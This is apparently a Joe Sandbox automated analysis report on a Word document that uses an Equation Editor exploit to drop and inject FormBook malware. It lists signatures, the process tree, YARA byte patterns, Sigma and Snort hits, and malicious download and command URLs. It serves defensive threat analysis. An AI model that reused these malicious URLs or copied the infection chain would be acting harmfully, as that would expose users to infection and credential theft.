Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Doc PI.doc

Overview

General Information

Sample name:Doc PI.doc
Analysis ID:1444130
MD5:05296d88142eb2e6929ab8f1f5131e18
SHA1:c242cc72aeb237706ac7a8af3f250d6772091589
SHA256:7d4ab5a581de7b1243a23c4383bb962d530bfc85c67f48e094b82301d1ff0654
Tags:doc
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic
Yara detected FormBook
.NET source code references suspicious native API functions
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1784 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 1596 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • loud89334.scr (PID: 3088 cmdline: "C:\Users\user\AppData\Roaming\loud89334.scr" MD5: ED7336086B1E5267C0D4863325956BE2)
        • loud89334.scr (PID: 3120 cmdline: "C:\Users\user\AppData\Roaming\loud89334.scr" MD5: ED7336086B1E5267C0D4863325956BE2)
          • sQNFFcxirzZbXqUULewCRS.exe (PID: 2952 cmdline: "C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • dfrgui.exe (PID: 3240 cmdline: "C:\Windows\SysWOW64\dfrgui.exe" MD5: FB036244DBD2FADC225AD8650886B641)
              • sQNFFcxirzZbXqUULewCRS.exe (PID: 2108 cmdline: "C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 3632 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
    • EQNEDT32.EXE (PID: 3260 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Doc PI.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xb985:$obj2: \objdata
  • 0xb9a1:$obj3: \objupdate
  • 0xb960:$obj6: \objlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.635052346.0000000000250000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.635052346.0000000000250000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b3c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1523f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.634933640.0000000000080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.634933640.0000000000080000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b3c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1523f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000E.00000002.479085527.0000000002AB0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.loud89334.scr.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          6.2.loud89334.scr.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            6.2.loud89334.scr.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ea03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x18882:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            6.2.loud89334.scr.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2dc03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17a82:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            5.2.loud89334.scr.4c80000.5.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
            • 0x6d26b:$x1: In$J$ct0r
            Click to see the 5 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Equation Editor Network Connection
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.21.74.191, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1596, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
            Sigma detected: Suspicious Microsoft Office Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\loud89334.scr", CommandLine: "C:\Users\user\AppData\Roaming\loud89334.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\loud89334.scr, NewProcessName: C:\Users\user\AppData\Roaming\loud89334.scr, OriginalFileName: C:\Users\user\AppData\Roaming\loud89334.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1596, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\loud89334.scr", ProcessId: 3088, ProcessName: loud89334.scr
            Sigma detected: SCR File Write Event
            Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1596, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\loudzx[1].scr
            Sigma detected: Suspicious Screensaver Binary File Creation
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1596, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\loudzx[1].scr
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1596, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Office Macro File Creation
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1784, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

            Snort Signatures

            Timestamp:05/20/24-08:54:20.390882
            SID:2855465
            Source Port:49165
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/20/24-08:55:35.008862
            SID:2855465
            Source Port:49179
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/20/24-08:55:21.654726
            SID:2855465
            Source Port:49175
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/20/24-08:55:48.350016
            SID:2855465
            Source Port:49183
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://universalmovies.top/vAvira URL Cloud: Label: phishing
            Source: http://www.terelprime.com/ufuh/?84O0=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&-Hc=N8_LbDFHuLL4ejZAvira URL Cloud: Label: malware
            Source: https://universalmovies.top/loudzx.scrAvira URL Cloud: Label: phishing
            Source: https://universalmovies.top/loudzx.scrjAvira URL Cloud: Label: phishing
            Source: https://universalmovies.top/loudzx.scrkkC:Avira URL Cloud: Label: phishing
            Source: https://universalmovies.top/Avira URL Cloud: Label: phishing
            Multi AV Scanner detection for domain / URL
            Source: universalmovies.topVirustotal: Detection: 21%Perma Link
            Source: https://universalmovies.top/loudzx.scrVirustotal: Detection: 17%Perma Link
            Source: https://universalmovies.top/Virustotal: Detection: 21%Perma Link
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\loudzx[1].scrReversingLabs: Detection: 15%
            Source: C:\Users\user\AppData\Roaming\loud89334.scrReversingLabs: Detection: 15%
            Multi AV Scanner detection for submitted file
            Source: Doc PI.docReversingLabs: Detection: 36%
            Source: Doc PI.docVirustotal: Detection: 41%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.loud89334.scr.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.loud89334.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.635052346.0000000000250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.634933640.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.479085527.0000000002AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.407188357.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.635242428.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.634993133.0000000000150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.407506842.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.635338207.0000000000AA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\loudzx[1].scrJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\loud89334.scrJoe Sandbox ML: detected

            Exploits

            barindex
            Office equation editor establishes network connection
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.21.74.191 Port: 443Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.21.74.191 Port: 443Jump to behavior
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\loud89334.scr
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\loud89334.scrJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: loud89334.scr, 00000005.00000002.370217484.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, loud89334.scr, 00000005.00000002.370034664.0000000000620000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dfrgui.pdb source: sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000003.394123184.00000000009D0000.00000004.00000001.00020000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000003.394273812.0000000000FA0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000002.635533344.000000000139E000.00000002.00000001.01000000.00000009.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000000.419589131.000000000139E000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: dfrgui.pdb2D source: sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000003.394123184.00000000009D0000.00000004.00000001.00020000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000003.394273812.0000000000FA0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: loud89334.scr, loud89334.scr, 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.635736352.0000000002220000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.407159126.0000000000660000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.407445701.0000000001F10000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.635736352.00000000020A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: >.pdb'<project></project>File source: loud89334.scr, 00000005.00000000.359382718.0000000000AB2000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.635447198.0000000000660000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000294C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000000.419606909.00000000033CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.478820963.000000000067C000.00000004.80000000.00040000.00000000.sdmp, loudzx[1].scr.2.dr, loud89334.scr.2.dr

            Software Vulnerabilities

            barindex
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Source: global trafficDNS query: name: universalmovies.top
            Source: global trafficDNS query: name: www.besthomeincome24.com
            Source: global trafficDNS query: name: www.terelprime.com
            Source: global trafficDNS query: name: www.sqlite.org
            Source: global trafficDNS query: name: www.sqlite.org
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.kinkynerdspro.blog
            Source: global trafficDNS query: name: www.xn--matfrmn-jxa4m.se
            Source: global trafficDNS query: name: www.primeplay88.org
            Source: global trafficDNS query: name: www.aceautocorp.com
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 54.38.220.85:80
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 194.9.94.86:80
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 91.195.240.19:80
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 198.12.241.35:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.74.191:443
